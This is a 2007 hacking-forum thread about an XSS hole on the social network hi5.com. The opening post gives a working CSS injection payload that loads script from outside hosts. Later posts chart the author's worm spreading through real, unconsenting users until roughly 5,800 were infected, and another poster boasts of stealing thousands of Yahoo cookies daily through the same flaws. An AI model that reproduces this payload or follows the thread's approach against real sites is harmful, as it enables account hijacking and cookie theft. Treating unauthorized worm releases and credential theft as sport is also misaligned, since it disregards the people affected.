Sla.ckers.org
hi5.com xss
Posted by: sirdarckcat
Date: December 23, 2007 12:53AM

http://www.hi5.com/friend/account/displayEditProfileCustomization.do

style:

<style type='text/css'>strong{
-moz-binding:url(" http://ha.ckers.org/moz.xml#xss");
}

strong{
background:url("javascript:void(document.body.appendChild(document.createElement('script')).src=' http://h4k.in/i.js');");
}
</style>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/23/2007 01:10AM by sirdarckcat.

Re: hi5.com xss
Posted by: klaus
Date: December 23, 2007 09:39PM

wow. xss worm hitting hi5 in less than 24h...

btw, what is i.js doing?

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 23, 2007 10:47PM

i.js is nothing.. that's the XSS test case from .mario :P

the worm is going very slow, since it's programmed just for firefox.. since I'm lazy and I don't wanna find out why it's not working on IE

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: hi5.com xss
Posted by: nemessis
Date: December 24, 2007 07:06PM

They have known about those issues for a long time. It is not a secret that hi5 has CSRF vulns in at least 4 places on the user profile pages. If you search at random, you will find some hijacked or specially made accounts used to steal users' passwords or cookies from other web services (Yahoo, Hotmail etc.). We tested hi5 to find all the CSRF vulns and the results are:
- on the main page of the profile: CSRF affecting IE6, Firefox and Safari for Windows
- on another profile page (shhht): CSRF affecting IE6, IE7, Firefox, Safari for Windows and Opera
- in the comment box there are 2 CSRF vulns, but I was too lazy to find out how they work and which browsers are affected. But a friend of mine is using that shit to steal "beautiful babes" accounts :)

Hi5 XSS worms have been up for a long time. You can find full working worm sources on Spanish and Turkish hacking websites.

Anyway, nice find sirdarckcat. I was glad 1 month ago when I discovered those XSS's for the first time, but when I googled it the results were very disappointing for me. Hi5 has been vulnerable for a very long time and those issues have been publicly disclosed by security/hacking teams for at least 6 months.



Edited 1 time(s). Last edit at 12/24/2007 07:08PM by nemessis.

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 24, 2007 07:38PM

http://www.hi5.com/friend/profile/displayProfile.do?userid=177612560

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 12/24/2007 08:41PM by sirdarckcat.

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 25, 2007 05:04AM

btw if you use NoScript or Firefox 3, the exploit won't work.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: hi5.com xss
Posted by: nemessis
Date: December 25, 2007 07:24AM

Do you have a method to find the results? I'm curious about the spreading speed.

My results in 10 hours (this was my first attempt and I attacked Yahoo accounts, not hi5 accounts, but I used the same hi5 vuln to do that - just the IE6 browser was affected in this attempt): http://rapidshare.com/files/74270062/rstpower.wmv.html

With IE6 + Firefox affected & a grabber that doesn't display empty/incomplete cookies I've got 2K of GOOD Yahoo cookies/day. So there is a big impact if someone uses a social network like hi5 for personal data stealing.

http://www.rstcenter.com - Romanian Security Team



Edited 1 time(s). Last edit at 12/25/2007 08:03AM by nemessis.

Re: hi5.com xss
Posted by: klaus
Date: December 25, 2007 08:03AM

Nemessis, ten users so far. Seems like hi5 users are not Firefox fans.

Re: hi5.com xss
Posted by: nemessis
Date: December 25, 2007 08:05AM

Yes indeed. Most of them are IE6/IE7 users.

http://www.rstcenter.com - Romanian Security Team
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 25, 2007 12:20PM

this works for IE6/7 but after exploitation it shows an error, anyway.. after exploitation..

Take into consideration it was Christmas Eve, no one is at hi5 at Christmas..

Anyway, I receive a friend request for each infected victim, so.. so far, 15, of which 13 are real.. if this is really exponential, tomorrow I should have like 3k friends, and 40k after that.. etc..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: hi5.com xss
Posted by: nemessis
Date: December 25, 2007 01:08PM

Nice. We didn't succeed in making a working exploit for IE7 on the main page of the profile.

http://www.rstcenter.com - Romanian Security Team
Re: hi5.com xss
Posted by: sirdarckcat
Date: December 25, 2007 11:19PM

there are now 82 infected.
7 are not infected, but sent the friend request, I dunno why.. maybe they use Opera/Safari/NoScript..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 26, 2007 12:02PM

A chart.. hey it is exponential.. anyway, it looks quadratic to me..



with help of thornmaker, and a very cool applet, it appears that the growth of the worm follows:

4.07271957142175*(1.049393949541566)^time



I'm thinking that the following worms should have google analytics..

For the record..

Account created:
hi5 <info@hi5.com> Welcome to hi5! Mon, 24 Dec 2007 16:26:00 -0700

The worm was on like.. 10 minutes after that.

I searched for random persons and sent them friend requests.. so they check my profile.

The first victim:

"info@hi5.com" <info@hi5.com> v4k3 Lozano has accepted your Friend Request Mon, 24 Dec 2007 18:39:52 -0700

It's a shame she deleted the account:

http://hi5.com/friend/profile/displayProfile.do?userid=19242119

She deleted the account.. on Wed, 26 Dec 2007 13:17:40 -0700

At 2:37 GMT-6 on Wednesday 26.. the script that added friends was slower than the users sending friend requests.

On Wednesday, spamcero.com staff sent an e-mail asking me to stop the e-mails.. so I changed the registration e-mail.

and well, no word from hi5.com staff.. yet

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 12 time(s). Last edit at 12/26/2007 03:07PM by sirdarckcat.

Re: hi5.com xss
Posted by: klaus
Date: December 26, 2007 03:31PM

This thing is going to reach "Singularity" in less than 24h!

Re: hi5.com xss
Posted by: klaus
Date: December 26, 2007 07:09PM

Over 3000 added now. Fascinating to see it spreading.

Re: hi5.com xss
Posted by: klaus
Date: December 26, 2007 08:48PM

5000 friends. Over and out. Santa removed.

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 27, 2007 12:47AM

actually the account was still there, I was still able to add friends, it reached 5,800, and then I was banned.

it was cool :P, the next worm should have google analytics, it would make the things much easier to track :P..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 27, 2007 08:30PM

This is the last chart I was able to get:



You can clearly see where I was no longer able to accept new friends.. they were arriving too fast


anyway, that stops at 1037 friends, the total was 5800, but I'm not able to get the other data since.. well.. the e-mail server collapsed.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/27/2007 08:31PM by sirdarckcat.

Re: hi5.com xss
Posted by: sirdarckcat
Date: December 29, 2007 01:13PM

I checked the e-mail again today; this is the last chart:



amazing.. even though it's not spreading anymore, all those persons added "Santa" as a friend.

And here's all the love the affected users sent to santa:

http://www.hi5.com/friend/profile/displayScrapbook.do?userid=177612560&offset=0&page=first

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/29/2007 01:16PM by sirdarckcat.
